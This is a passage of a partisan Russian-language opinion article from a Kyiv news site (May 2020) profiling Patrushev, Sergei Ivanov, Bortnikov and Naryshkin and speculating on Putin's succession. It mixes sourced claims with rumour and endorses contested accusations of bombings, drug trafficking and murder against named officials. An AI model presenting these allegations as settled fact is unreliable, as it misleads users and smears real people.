кресло главы ФСБ, оттуда – в премьер-министры в августе 1999 года, затем уже 31 декабря 1999 года больной Ельцин называет Путина своим преемником, назначает исполняющим обязанности президента. Наконец, в марте 2000 года он занимает президентский пост, каковой занимает по сей день и имеет все шансы просидеть на нем еще лет этак 16.</p><p>Итак, в 1996 году Путин был далеко не самым важным клерком в Петербургской мэрии Собчака, а через каких-то 4 года становится президентом России. Что же послужило невиданному взлету Путина, приведя к власти нынешнее путинское окружение, включая Патрушева. Путина в администрацию пригласил Валентин Юмашев, советник, глава администрации и зять Ельцина, а также <a href="https://gordonua.com/publications/istorik-felshtinskiy-kazus-sovetnika-putina-valentina-yumasheva-1210609.html" target="_blank" rel="nofollow noopener noreferrer">кадровый сотрудник КГБ</a> (в 1987 году перешел работать из &#171;Комсомольской правды&#187; в «Огонек», где занимал должность начальника отдела писем. Отделом писем в Советском Союзе, как правило, заведовали лица, работавшие на КГБ, поскольку для КГБ это был один из способов сбора информации о реальном недовольстве в стране). Юмашев признавал, что ему посоветовал Путина Чубайс, который работал с Путиным в Петербурге.</p><p>Правда, в свое время ныне покойный, умерший при весьма подозрительных обстоятельствах в эмиграции Борис Березовский приписывал именно себе заслугу в том, что Путин появился в московских верхах и, в конечном итоге, возглавил Россию. Нечто подобное утверждает и упомянутый выше глава ельцинской охраны Александр Коржаков: якобы для содействия повторному избранию Ельцина на второй срок в 1996 году Юмашев привлек доктора физико-математических наук, бизнесмена и беспринципного, но крайне эффективного проходимца Березовского, а уже Березовский привлек Путина, с которым тоже пересекался в Питере. Убитый Борис Немцов также называл Березовского ответственным за приход к власти Путина, которого он порекомендовал Ельцину на должность преемника.</p><p>Березовский: «Я был одним из тех, кто принимал участие в подготовке решения для Ельцина по назначению Путина на должность президента России, считал, что выбор между Примаковым (на то время премьер-министр России, занимавший эту должность с 11 сентября 1998 г. по 12 мая 1999 г., кадровый сотрудник КГБ: с 30 сентября 1991 года — руководитель Первого главного управления КГБ СССР, первый заместитель председателя КГБ, с 6 ноября 1991 года — руководитель Центральной службы разведки СССР, с 26 декабря 1991 по январь 1996 года &#8212; директор Службы внешней разведки России) и Путиным – это выбор между плохим и хорошим решением». Позднее, в 2007 году Березовский говорил, что это был выбор между плохим и очень плохим решением, тогда еще он считал, что Примаков был бы очень плохим выбором для России и отдавал предпочтение Путину, несмотря на жесткий конфликт между ними, из-за которого Березовскому пришлось эмигрировать из РФ. Большинство активов Березовского было отобрано путинской Россией, а он с сентября 2003 года до конца жизни, оставаясь гражданином РФ, постоянно проживал в Великобритании в качестве политического беженца.</p><p><iframe width="560" height="315" src="https://www.youtube.com/embed/oc4z-6D7Fmo" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p><p>Работая на разных должностях в администрации вплоть до замглавы, то есть заместителя Юмашева, Путин проявил себя тем, что курировал ряд громких расследований, в частности, по эффективности использования средств оборонного заказа, в результате чего был уволен министр обороны Игорь Родионов. Также Путин активно участвовал в отстранении от власти генерального прокурора Ю́рия Скуратова. Скандал был связан с документальным фильмом «Трое в постели», показанным по государственному телеканалу «РТР», где «человек, похожий на генерального прокурора», занимался сексом с двумя девушками. В появлении записи Скуратов обвинял Путина, который в тот период возглавлял ФСБ: «Они в панике думали, что бы такого сделать, чтобы я ушёл со своего поста, и выбрали этот способ». По утверждению журналиста Павла Шеремета, «Путин, как говорят люди из ближнего окружения Ельцина, отвечал за то, чтобы Скуратов тихо ушёл из Генпрокуратуры и не стал „мутить воду“».</p><p>В ноябре 1997 года Путин организовал отъезд во Францию своего бывшего руководителя Анатолия Собчака, проходившего по уголовному делу о злоупотреблениях в мэрии Санкт-Петербурга. По мнению Валентина Юмашева, этот эпизод повлиял на выбор Путина в качестве преемника Ельцина, поскольку стало ясно, что «своих он не сдает», а потому Ельцину и его окружению не стоит бояться преследований за совершенные преступления в случае прихода Путина к власти.</p><p>Патрушеву молва приписывает многочисленные грехи от банальной коррупции до наркотиков и организации убийств, включая массовые. В частности, Патрушева обвиняют в причастности к убийству сбежавшего на Запад бывшего офицера ФСБ Александра Литвиненко. 21 января 2016 года судья Высокого суда Британии сэр Роберт Оуэн в ходе объявления результатов общественного дознания по делу Александра Литвиненко заявил: судом установлено, что Литвиненко был убит бывшим офицером Госуправления охраны Андреем Луговым и его партнёром Дмитрием Ковтуном. По заключению Оуэна, убийство, «скорее всего, одобрили» лично глава ФСБ Николай Патрушев и российский президент Владимир Путин.</p><p>6 апреля 2018 года Патрушев включён в санкционный «Кремлёвский список» США в числе 17 чиновников и 7 бизнесменов из России, приближённых к В. Путину.</p><p>Выдвигаются против Патрушева и обвинения в причастности к взрывам жилых домов в России 1999 года и других терактам, прежде всего, в Москве, Буйнакске и Волгодонске, целью которых был «запрос на твердую руку» и, как следствие, приход к власти Владимира Путина. В результате терактов 307 человек погибли, более 1700 человек получили ранения различной степени тяжести или пострадали в той или иной мере.</p><p>Согласно официальной версии и приговорам судебных органов России, теракты были организованы и профинансированы руководителями незаконного вооружённого формирования Исламский институт «Кавказ» Эмиром аль-Хаттабом и Абу Умаром и осуществлены нанятыми ими группами северокавказских боевиков. В течение нескольких лет после совершения терактов подавляющая часть как организаторов, так и исполнителей терактов, была либо осуждена, либо убита в ходе спецопераций российских и грузинских силовых структур.</p><p>Однако есть вполне правдоподобная версия, которой придерживаются историк Рутгеровского университета (США) Юрий Фельштинский, убиенный бывший сотрудник ФСБ Александр Литвиненко, оппозиционный политолог Андрей Пионтковский и ряд других лиц из числа российской оппозиции, часто весьма неоднозначных. Например, Фельштинский, эмигрировавший из СССР в 1970-х годах, вполне спокойно сотрудничал с Березовским и брал у него деньги, хотя Березовский нажил барыши на разграблении наследия СССР и участвовал в приведении к власти Путина. В свою очередь, Пионтковский, насколько можно понять, гневно клеймит позором бандитский капитализм России и его бывшую важную составную часть в лице Бориса Березовского в книге «За Родину! За Абрамовича! Огонь!». Впрочем, русские оппозиционеры всегда вызывали, мягко говоря, недоумение в силу их продажности и «кухонных разборок» между собой, а их истерично-обличительные вопли в адрес Путина не представляют для российской власти ни малейшей опасности.</p><p>О взрывах в России накануне прихода к власти Путина подробно говорится в книге Литвиненко «ФСБ взрывает Россию» в соавторстве с Фельштинским, а также в книге Литвиненко <a href="http://www.e-reading.club/bookreader.php/34455/aleksandr-litvinenko-lubyanskaya-prestupnaya-gruppirovka.html" target="_blank" rel="nofollow noopener noreferrer">«Лубянская преступная группировка»</a>. Считается, что правда вскрылась после того, как 22 сентября 1999 года местный житель Рязани заметил, как в подвал жилого дома неизвестные заносят мешки, а поскольку в это время по России гремели взрывы, этот житель сообщил в местное отделение ФСБ. Рязанские спецслужбы якобы обнаружили в подвале гексоген и боевые взрыватели и возбудили уголовное дело по факту подготовки теракта. Но вдруг в дело включилась головная московская контора ФСБ, где заявили, что это были имитация и учение на предмет проверки бдительности. Дело у ничего не ведавших о московских играх рязанских ФСБшников забрали и засекретили. Есть версия, что теракт готовился настоящий, но в Рязани ФСБ было не в курсе и выполнило служебный долг. При этом в вопросе «отмазывания конторы» от теракта особо усердствовал глава ФСБ Патрушев, что дает основание для обвинений в его адрес в причастности к этим массовым убийствам российских граждан.</p><p>Есть в «активе» Патрушева еще один «косяк». Это обвинение в распространении и транспортировке наркотиков. В указанной книге Литвиненко «Лубянская преступная группировка» приводятся данные о том. что российские спецслужбы с советских времен замешаны в наркотрафике из Афганистана через Среднюю Азию и Россию на Запад, причем активное участие в этом принимало то самое находящееся на границе ленинградское подразделение КГБ, в котором в свое время служили Путин, Патрушев, Иванов и другие, и в которое в 1980-х годах попала группа сотрудников, ранее работавших в Узбекистане и замешанных в наркотиках. </p><p>Вовлеченность ФСБ и лично Патрушева в «наркоту» подтверждается скандалом с «аргентинским кокаином», который подробно <a href="https://www.dw.com/ru/%D1%81%D0%BC%D0%B8-%D1%83%D0%B7%D0%BD%D0%B0%D0%BB%D0%B8-%D0%BE-%D1%80%D0%BE%D0%BB%D0%B8-%D0%BF%D0%B0%D1%82%D1%80%D1%83%D1%88%D0%B5%D0%B2%D0%B0-%D0%B2-%D0%BE%D0%BF%D0%B5%D1%80%D0%B0%D1%86%D0%B8%D0%B8-%D1%81-%D0%B0%D1%80%D0%B3%D0%B5%D0%BD%D1%82%D0%B8%D0%BD%D1%81%D0%BA%D0%B8%D0%BC-%D0%BA%D0%BE%D0%BA%D0%B0%D0%B8%D0%BD%D0%BE%D0%BC/a-42728807" target="_blank" rel="nofollow noopener noreferrer">освещали медиа</a>, а потому остановимся на нем очень кратко.</p><p>В 2016 году в российском посольстве в Буэнос-Айресе был обнаружен дипломатический багаж с 400 килограммами наркотиков. Посольство уведомило аргентинские власти, кокаин изъяли и якобы начали совместную российско-аргентинскую операцию по выявлению соучастников, подменив кокаин мукой. Отмечается, что Аргентина не стала предавать дело огласке, чтобы не портить отношение с Москвой. По данным Москвы, транспортировку якобы муки в рамках операции осуществлял самолет Патрушева при личном его участии. По другим данным, это была не мука, а наркотики, которые аргентинцы дали возможность вывезти под видом операции, чтобы русские могли по-тихому «прибрать за собой», а личное участие Патрушева якобы подтверждает то, о чем писал Литвиненко, то есть, что российские спецслужбы и лично Патрушев замешаны в наркотрафике.</p><p>Если верить Илларионову, у Патрушева есть еще одна особенность, которую можно охарактеризовать как «отмороженность». Андрей Илларионов утверждает, что Патрушев является сторонником п<a href="https://www.youtube.com/watch?v=w0DCgbBKdAw" target="_blank" rel="nofollow noopener noreferrer">ревентивного ядерного удара</a>, в том числе по объектам, не представляющим ядерную угрозу. Это мнение Патрушев якобы высказывал в некоем тесном кругу, но даже Путин в этом вопросе выступал резко против. Иными словами, по сравнению с Патрушевым даже Путин является «голубем мира».</p><p>Вторым в окружении Путина по степени опасности Илларионов <a href="https://www.youtube.com/watch?v=w0DCgbBKdAw" target="_blank" rel="nofollow noopener noreferrer">называет</a> <strong>Сергея Иванова</strong>. В частности, Илларионов считает Иванова организатором убийства бывшего чеченского президента Зелимхана Яндарбиева, который был взорван в столице Катара Дохе 18 февраля 2004 года. Катарские власти арестовали и осудили на пожизненное заключение двух сотрудников российского посольства Белашкова и Богачева, хотя есть мнение, что их имена-фамилии были вымышленными. Третий соучастник Александр Фетисов, имевший должность первого секретаря посольства и дипломатический иммунитет, уголовному преследованию по этой причине не подвергался, а был выслан из Катара. Российская сторона, естественно, отрицала свою причастность и причастность ее граждан к убийству Яндарбиева. В ответ <a class="tag" href="https://enovosty.com/tag/moskva" target="_blank">Москва</a> фактически захватила в заложники катарских спортсменов, предъявив им подозрения в террористических актах на территории России, а также обвинив в незаконном провозе валютных средств через границу.</p><p><img src="https://enovosty.com/wp-content/uploads/2020/05/sergey_ivanov2_ed.jpg" title="Коллективный Путин и его составные части" alt="Коллективный Путин и его составные части" width="640" height="411" class="aligncenter size-full wp-image-4805555" srcset="https://enovosty.com/wp-content/uploads/2020/05/sergey_ivanov2_ed.jpg 640w, https://enovosty.com/wp-content/uploads/2020/05/sergey_ivanov2_ed-112x72.jpg 112w, https://enovosty.com/wp-content/uploads/2020/05/sergey_ivanov2_ed-300x193.jpg 300w, https://enovosty.com/wp-content/uploads/2020/05/sergey_ivanov2_ed-460x295.jpg 460w" sizes="(max-width: 640px) 100vw, 640px" /></p><p>Пребывая в марте того же года в Париже, Сергей Иванов, тогдашний министр обороны России, заявил: «Государство использует все имеющиеся в его распоряжении средства для освобождения российских граждан, незаконно арестованных в Катаре». Из этого следует, что Иванов может быть причастен к организации убийства.</p><p>В декабре 2004 года российские спецслужбисты были переданы Москве в рамках соглашения о передаче осуждённых для отбывания наказания в России. Их встречали в аэропорту с красными дорожками, а потом их следы в России затерялись, и Федеральная служба исполнения наказаний России не может предоставить данные об их местонахождении.</p><p>Однако обратимся собственно к Сергею Иванову, родившемуся в 1953 году в Ленинграде и входящему в ближайшее окружение Путина.</p><p>Окончил переводческое отделение филологического факультета Ленинградского государственного университета и военную кафедру при нём (1975), высшие курсы КГБ СССР в Минске (1976), Краснознамённый институт КГБ СССР (1981). В 1974 году был отправлен изучать английский язык в Илингский технический колледж (Великобритания). В 1975 году был принят на службу в КГБ СССР. В 1976-1977 годах — сотрудник 1-го отдела Управления КГБ по Ленинграду и Ленинградской области, где работал в одном подразделении вместе с будущим президентом РФ Владимиром Путиным. До 1985 года работал в резидентуре в Финляндии, а затем в Кении, куда, по его словам, был переведён из-за своего раскрытия в Европе Олегом Гордиевским. В 1991-1998 годах продолжил работать в Службе внешней разведки России. Службу в разведке закончил первым заместителем директора Европейского департамента СВР России. С 15 ноября 1999 года — секретарь Совета безопасности России. 28 марта 2001 года назначен министром обороны Российской Федерации, 14 ноября 2005 года — заместителем председателя правительства Российской Федерации — министром обороны Российской Федерации. 15 февраля 2007 года освобождён от указанной должности и назначен первым заместителем председателя правительства Российской Федерации.</p><p>Руководитель администрации президента России с декабря 2011 года по август 2016 года. Постоянный член Совета Безопасности Российской Федерации. Специальный представитель президента РФ по вопросам природоохранной деятельности, экологии и транспорта. Полный кавалер ордена «За заслуги перед Отечеством». Действительный государственный советник РФ I класса (2011 год). Генерал-полковник в отставке. Председатель совета директоров ПАО «Ростелеком» с 15 июня 2015 года. С 12 августа 2016 года — специальный представитель президента Российской Федерации по вопросам природоохранной деятельности, экологии и транспорта. Свободно владеет английским и шведским языками.</p><p>Иванов в 2007 году считался одним из кандидатов на пост президента, но выбор был сделан в пользу Медведева, возможно, как более предсказуемого и управляемого. Любопытно, что Медведева к окружению Путина не относят. В то же время Путин сам признавал, что Иванов — один из его ближайших соратников. Возможно, Путина остановил слишком жесткий характер Иванова, то есть и по отношению к Иванову Путина можно считать «голубем».</p><p>В 1999–2001 годах Сергей Иванов участвовал в операции по установлению контроля над крупнейшими ТВ-каналами путём рейдерского изъятия активов у Владимира Гусинского и Бориса Березовского.</p><p>В 2006 году большой резонанс вызвало заявление Иванова о готовности России уничтожать возможных исполнителей терактов в любой точке мира: «Если мы точно знаем, что в том или ином регионе мира готовится террористический акт, направленный против России или ее граждан, мы оставляем за собой право нанести удар, чтобы предотвратить это… Для этого можно использовать все, что угодно, кроме ядерного оружия, лишь бы это было эффективно». Это заявление многими интерпретировалось как циничное подтверждение готовности российских властей уничтожать не только и не столько реальных террористов, сколько своих политических оппонентов.</p><p>Будучи многолетним куратором военно-промышленного комплекса, Иванов обвиняется не только в милитаризации экономики, но и в коррупции в этой сфере, а также в незаконных поставках вооружений в «горячие точки».</p><p>Несет ответственность за агрессию в отношении Украины, за что с 2014 года включен в санкционные списки США.</p><p>Прежде чем перейти к следующему персонажу, нынешнему директору ФСБ Александру Бортникову, следует немного снова вернуться к бывшему главе этой «конторы» Николаю Патрушеву.</p><p>Пребывая на посту директора ФСБ, Патрушев обнаружил наполеоновские замашки и начал «бронзоветь». Он практически открыто говорил о возрождении КГБ, что подразумевало объединение в ФСБ всех спецслужб, включая Службу внешней разведки и Федеральную службу охраны, причем с Патрушевым во главе. При этом Патрушев подминал под себя и МВД во главе с Рашидом Нургалиевым. Патрушев развил бурную медиа-активность, часто мелькал в СМИ, делал шокирующие заявления о создании касты «новых дворян», к числу которых должны относиться сотрудники ФСБ. Патрушев даже фигурировал в качестве прототипа в кино «Код Апокалипсиса» с участием Анастасии Заворотнюк и Венсана Переса.</p><p>В конечном итоге, все это надоело Путину, и теперь Патрушеву приходится довольствоваться должностью секретаря совета безопасности, которая при Путине утратила то значение, которое имела при Ельцине, превратившись в синекуру.</p><p>Так на посту главы ФСБ оказался <strong>Александр Бортников</strong>, который имел долгий конфликт с Патрушевым. Трудно сказать, насколько Бортников является «окружением Путина» и насколько сильно он может влиять на принятие решений. Он также служил в Ленинградском КГБ в то же время, когда и Путин, но в те времена, по некоторым данным, они были просто хорошо знакомы, и не более того. Есть версия, что в момент, когда стало необходимым убирать Патрушева, Бортников оказался фигурой, компромиссной для различных группировок Кремля. К тому же Бортникова поддерживал указанный выше нынешний глава «Роснефти» Сечин, имеющий серьезное влияние.</p><p><img src="https://enovosty.com/wp-content/uploads/2020/05/bortnikov2_ed.jpg" title="Коллективный Путин и его составные части" alt="Коллективный Путин и его составные части" width="640" height="407" class="aligncenter size-full wp-image-4805556" srcset="https://enovosty.com/wp-content/uploads/2020/05/bortnikov2_ed.jpg 640w, https://enovosty.com/wp-content/uploads/2020/05/bortnikov2_ed-112x71.jpg 112w, https://enovosty.com/wp-content/uploads/2020/05/bortnikov2_ed-300x191.jpg 300w, https://enovosty.com/wp-content/uploads/2020/05/bortnikov2_ed-460x293.jpg 460w" sizes="(max-width: 640px) 100vw, 640px" /></p><p>Так Бортников с мая 2008 года оказался во главе ФСБ и получил звание генерала армии. Родившийся в 1951 году в Перми (тогда Молотов), Бортников в 1973 году окончил Ленинградский институт инженеров железнодорожного транспорта, затем работал по специальности в Гатчине под Ленинградом. В 1975 году окончил Высшую школу КГБ СССР имени Ф. Э. Дзержинского в Москве. С 1975 года — в органах государственной безопасности. Проходил службу на должностях оперативного и руководящего состава в контрразведывательных подразделениях УКГБ СССР по Ленинградской области, позднее – УФСБ по городу Санкт-Петербургу и Ленинградской области. До июня 2003 года — заместитель начальника Управления ФСБ России по Санкт-Петербургу и Ленинградской области по контрразведывательным операциям. С 1 июля 2003 по 28 февраля 2004 года — начальник Управления ФСБ России по Санкт-Петербургу и Ленинградской области.</p><p>Со 2 марта 2004 года — замдиректора ФСБ России — начальник Департамента экономической безопасности ФСБ России. С 11 июля 2004 года — руководитель Службы экономической безопасности ФСБ России. С апреля 2005 года — член Комиссии по экспортному контролю РФ. Наконец, с 12 мая 2008 года — директор ФСБ России, председатель Национального антитеррористического комитета, а с 25 мая — также постоянный член Совета Безопасности Российской Федерации.</p><p>Несмотря на санкции против ряда российских чиновников и бизнесменов, введенные США, ЕС и Канадой, Бортников в санкционные списки не попал. Это дало ему возможность посещать Вашингтон. В частности, в январе 2018 года Бортников вместе с главой СВР Нарышкиным и начальником военной разведки Коробовым совершил визит в Вашингтон, где они встретились с директором ЦРУ Майком Помпео и обсудили угрозы возвращения из Сирии боевиков «Исламского государства», которые ранее прибыли воевать в Сирию из России и стран Центральной Азии.</p><p>Компромат на Бортникова, который мелькает в медиа, имеет стандартный как для российского чиновника вид. Это не задекларированные доходы и аферы с землей. Звучат, причем даже в российских СМИ, обвинения в применении пыток в ФСБ, что также не является новостью. То же самое касается нарушения законности и правового нигилизма в рядах «конторы». Но поскольку Бортников пока устраивает все основные центры влияния, включая Путина, он продолжает занимать пост главы ФСБ.</p><p>Заканчивая с персонажами, которых называют «окружением Путина, необходимо обязательно обратить внимание на нынешнего директора Службы внешней разведки (СВР) <strong>Сергея Нарышкина</strong> (1954).</p><p><img src="https://enovosty.com/wp-content/uploads/2020/05/narishkin2_ed.jpg" title="Коллективный Путин и его составные части" alt="Коллективный Путин и его составные части" width="640" height="383" class="aligncenter size-full wp-image-4805557" srcset="https://enovosty.com/wp-content/uploads/2020/05/narishkin2_ed.jpg 640w, https://enovosty.com/wp-content/uploads/2020/05/narishkin2_ed-112x67.jpg 112w, https://enovosty.com/wp-content/uploads/2020/05/narishkin2_ed-300x180.jpg 300w, https://enovosty.com/wp-content/uploads/2020/05/narishkin2_ed-460x275.jpg 460w" sizes="(max-width: 640px) 100vw, 640px" /></p><p>Детство Нарышкин провел во Всеволожске Ленинградской области, где с отличием окончил школу. В 1978 году окончил Ленинградский механический институт по специальности «инженер-радиомеханик». Также окончил Санкт-Петербургский международный институт менеджмента по специальности «экономист». Владеет английским и французским языками. Доктор экономических наук.</p><p>По неофициальным данным, в период с 1978 по 1982 год проходил подготовку в специальных учебных заведениях Комитета государственной безопасности СССР. Учился на двухгодичном факультете в 101-й школе Первого главного управления КГБ (ныне — Академия внешней разведки). По окончании учёбы, по словам самого Нарышкина, в 1980 году в Ленинградском управлении КГБ познакомился с Путиным. В ходе обучения Нарышкин имел оперативный псевдоним «Наумов». Учился также во «французской» группе одногодичного 8-го факультета Высшей школы КГБ в Москве.</p><p>Карьера Нарышкина развивалась интересно. С 1982 года — помощник проректора по международным научным связям, заместитель начальника Отдела внешнеэкономических связей Ленинградского политехнического института. Туда его, очевидно, командировали из КГБ, чтобы перейти к следующему этапу карьеры – должности сотрудника аппарата экономического советника посольства СССР в Бельгии. Судя по всему, это техническая и экономическая разведка, причем в «столице НАТО» Брюсселе, а на такую работу тогда кого попало не направляли.</p><p>После возвращения из-за рубежа, в начале 1990-х Нарышкин работал начальником отдела комитета по экономическому развитию, позже — комитета по экономике и финансам мэрии Санкт-Петербурга, где работал и Путин. В течение 1990-х годов работал в ряде государственных и коммерческих структур Ленинградской области.</p><p>С приходом Путина к власти Нарышкин перебрался в Москву, и его карьера стремительно пошла вверх. С февраля 2004 года — заместитель начальника экономического управления Администрации президента. С марта 2004 года — заместитель руководителя аппарата правительства России. С сентября 2004 года — руководитель аппарата правительства — министр России. С февраля 2007 года —заместитель председателя правительства — руководитель аппарата правительства.</p><p>С 12 мая 2008 по 20 декабря 2011 года — руководитель администрации президента России. В западных СМИ появлялось мнение, что Нарышкин в это время «приглядывал за Медведевым», который «грел» место для Путина.</p><p>4 декабря 2011 года Нарышкин был избран депутатом Госдумы, а уже 21 декабря стал председателем Госдумы. В 2018 году во время допроса в Оболонском суде по делу о госизмене Януковича бывший глава Верховной Рады Александр Турчинов заявил, что 28 февраля 2014 года глава Госдумы Сергей Нарышкин угрожал тогдашнему и.о. президента Украины Турчинову вооруженным вторжением в Украину.</p><p>На парламентских выборах 2016 года Нарышкин опять переизбрался в Думу, но отказался от мандата, поскольку получил назначение на должность директора Службы внешней разведки.</p><p>Нарышкин внесен в санкционные списки в связи с агрессией России в Украине, но, как сказано выше, это не мешает Вашингтону, когда нужно, принимать его на уровне главы ЦРЦ, что весьма показательно.</p><p>Несмотря на некоторую компрометирующую информацию в медиа, Нарышкина можно считать наиболее чистым персонажем из окружения Путина. К тому же, Нарышкин обладает рядом дополнительных положительных качеств: свободно владеет английским и французским языками, по-европейски воспитан, даже во внешнем облике имеет нечто «джентльменское», галантен и обаятелен, интересуется поэзией, музыкой, театром, бардовским творчеством, хорошо играет на гитаре, обладает авторитетом, а также недюжинными морально-деловыми и интеллектуальными способностями.</p><p>Все это наталкивает на мысль о том, что в случае смены власти именно его можно рассматривать в качестве главного «претендента на престол», который будет восприниматься Западом.</p><p>И такие тенденции, очевидно, имеются в Кремле, поскольку Нарышкин имеет славу «третьего преемника Путина», очевидно вслед за указанными выше Медведевым и Ивановым. Другое дело, что в Москве имеет место подковерная борьба за власть, и у Нарышкина наверняка есть оппоненты из противоборствующих «башен Кремля».</p><p>Более того, не до конца понятна позиция Путина, который, похоже, сомневается и еще до конца не принял решение о том, уходить или оставаться в 2024 году или даже ранее, не разнесет ли междоусобица созданную им за 20 лет конструкцию власти, кому именно доверить «высокое звание наследника престола». Кроме того, события последнего времени, прежде всего коронавирусный кризис, смешал многие карты…</p><p><strong>Туманные перспективы Путина и его наследника</strong></p><p>Итак, детальный экскурс в тему окружения Путина и царящих в нем нравов и настроений заставляет сильно усомниться в справедливости слухов о том, что Путин мало что решает, и за него все решает окружение. Дело даже не в упоминавшемся ранее мнении российского политолога <a href="https://www.youtube.com/watch?v=Ltn5F0mhhvo" target="_blank" rel="nofollow noopener noreferrer">Валерия Соловья</a> о том, что Путин принимает решения самостоятельно, в частности, именно так было в случае с отказом от подписания соглашения в рамках ОПЕК+, в чем потом публично обвинили главу «Роснефти» Игоря Сечина, чтобы отвратить обвинения от Путина.</p><p>Тот факт, что в своих умозаключениях Соловей ссылается фактически на сплетни, здесь мало что меняет, поскольку дедукцию и причинно-следственные связи никто не отменял.</p><p>Даже вышеизложенного достаточно, чтобы понять, что между так называемыми «башнями Кремля», то есть между различными представителями все того же окружения Путина, существуют резкие противоречия, прежде всего по вопросам раздела власти и денег. Да один только Патрушев с его «тараканами» чего стоит, особенно, если его оставить без руководства со стороны Путина!</p><p>В условиях жестких «терок» различных центров влияния логично предположить, что Путин действительно принимает важные решения самостоятельно, максимум учитывая интересы различных группировок в своем окружении, чтобы они не развалили ту конструкцию власти, которую Путин создавал.</p><p>В этом же смысле весьма сомнительным представляется ситуация, когда Путин по примеру Ельцина вот так просто назовет преемника и уйдет.</p><p>В этом смысле крайне сомнительным является <a href="https://rusmonitor.com/valerij-solovej-v-2022-godu-putina-ne-budet-v-rossijskoj-politike-voobshhe-ni-v-kakom-vide.html)" target="_blank" rel="nofollow noopener noreferrer">заявление </a>упомянутого Соловья о том, что «в 2022 году Путина в политике не будет». К тому же,это утверждение он никак не обосновывает, отделываясь весьма сомнительными намеками. Таким же необоснованным представляется утверждение Соловья о том, что в качестве преемника сейчас следует рассматривать мэра Москвы Сергея Собянина. Собянин сейчас проявил во время карантина и эпидемии коронавируса, но говорить о его возможностях возглавить России представляется, как минимум, преждевременным.</p><p>Однако в любом случае нельзя отрицать, что с проблемой путинского окружения тесно связан такой архиважный вопрос, как преемственность власти, или, как модно говорить в современной России, «транзит власти». Тем более что этот «транзит» вовсе не означает смену Путина на кого-либо другого. Пока что все идет к тому, что Путин продолжит восседать на престоле еще более 15 лет. И транзит власти означает не смену президента, а создание такой видимости дальнейшего легитимного пребывания Путина у власти, которая была бы воспринята как внутри России, так и за ее пределами. В подробности вдаваться не будем, поскольку об этом недавно уже приходилось подробно <a href="https://enovosty.com/politika/full/1303-putin-koshhej-bessmertnyj-nashix-dnej" target="_blank" rel="nofollow noopener noreferrer">писать</a>.</p><p>Все было бы ничего, если бы не случившиеся эпидемия и карантин. </p><p>Большой удар нанесла отмена парада ко Дню Победы в связи с карантином, о чем также недавно приходилось <a href="https://enovosty.com/society/full/2004-koronavirus-rossijskoj-imperii-i-okkupirovannyx-ordlo" target="_blank" rel="nofollow noopener noreferrer">писать</a>. На парад возлагались большие надежды как на способ прорыва международной полуизоляции, легитимации путинского режима и самого Путина, поскольку ожидался приезд руководителей ряда стран Европы.</p><p>Но отмена парада – это еще полбеды… Представляется, что намного хуже ситуация с <a href="https://enovosty.com/politika/full/1303-putin-koshhej-bessmertnyj-nashix-dnej" target="_blank" rel="nofollow noopener noreferrer">референдумом</a> 22 апреля об изменениях в Конституцию России, фактически о продлении полномочий Путина до 2036 года.</p><p>По мнению Валерия Соловья, чем дольше продолжается сидение на карантине и ухудшение социально-экономической ситуации в стране, тем меньше шансов на то, что референдум приведет к «чистой победе» Путина, то есть не придется слишком сильно подтасовывать результаты, что так или иначе приведет к негативным последствиям, вплоть до непризнания дальнейшей легитимности Путина, которая и без того вызывает вопросы после «дважды двух сроков сидения на троне с перерывом на Медведева». </p><p>По словам Соловья, рейтинг Путина упал по стране до менее 40%, а в Москве – до немногим более 20%. В отличие от Украины, это почти катастрофа, в этих условиях проведение референдума чревато провалом (https://www.youtube.com/watch?v=Ltn5F0mhhvo). Соловей утверждает, что окружение Путина якобы за его спиной уже шушукается о том, что он стал «не фартовым», и от него отвернулась «госпожа удача». Но даже если это и так, то консенсусной фигуры преемника все равно нет.</p><p>Правда, по последним опросам Левада-центра, который в симпатиях в Путину не замечен, называются другие цифры – несколько более 50%, что для Украины было бы очень хорошо, но для России, конкретно для Путина, тоже очень мало.</p><p>Словом, в ближайшее время на наших глазах будет разворачиваться крайне любопытное действо, связанное с так называемым транзитом власти в России.</p><div class="tptn_counter" style="color:white;" id="tptn_counter_4805539"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4805539&amp;_wpnonce=04e1f07ef0"></script></div><div class="swp-content-locator"></div><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"/> <meta itemprop="width" content="512"> <meta itemprop="height" content="512"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Александр Карпец"></span><meta itemprop="datePublished" content="2020-05-19T17:08:58+03:00"/><meta itemprop="dateModified" content="2020-05-19T18:38:48+03:00"/><meta itemprop="genre" content="Политика"/><meta itemprop="description" content="Само собой якобы разумеющееся утверждение о том, что Россией правит Путин, 20-летие сидения на московском троне отмечалось в марте нынешнего года, при ближайшем рассмотрение является достаточно сомнительным, во всяком случае это отнюдь не аксиома. В сети имеется достаточно информации о том, что у Путина есть такой себе круг особо приближенных лиц, оказывающих влияние на принятие им решений, мнение которых он учитывает. Все это вполне в российских традициях, где со времен московских царей существовали так называемые ближние бояре. Не менее, возможно, даже более важным вопрос окружения Путина видится в свете продления или не продления им своих полномочий после истечения нынешней каденции в 2024 году, а также в смысле определения преемника Путина на московском «троне», тем более что ходят слухи о его более раннем отходе от дел…"/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2020/05/cover111.jpg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2020/05/cover111.jpg"><meta itemprop="width" content="460"><meta itemprop="height" content="284"> </span></span></div></article></div> <div class="postFooter"><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/youtube.jpg"></a> <div id="postAuthor"><span id="authorName" style="margin-right: 25px;float: left;"> <a href="/10573-aleksandr-karpec"><span id="label">Автор: </span>Александр Карпец</a></span><div id="postDate" style="width: 200px;"><span> 19.05.2020 17:08:58 </span><span id="issueNumber"> </span></div><div style="float:right;font: 11px/16px Arial,Verdana,sans-serif;margin-top: -18px;margin-right: 15px;">Посещений: 370</div></div><a 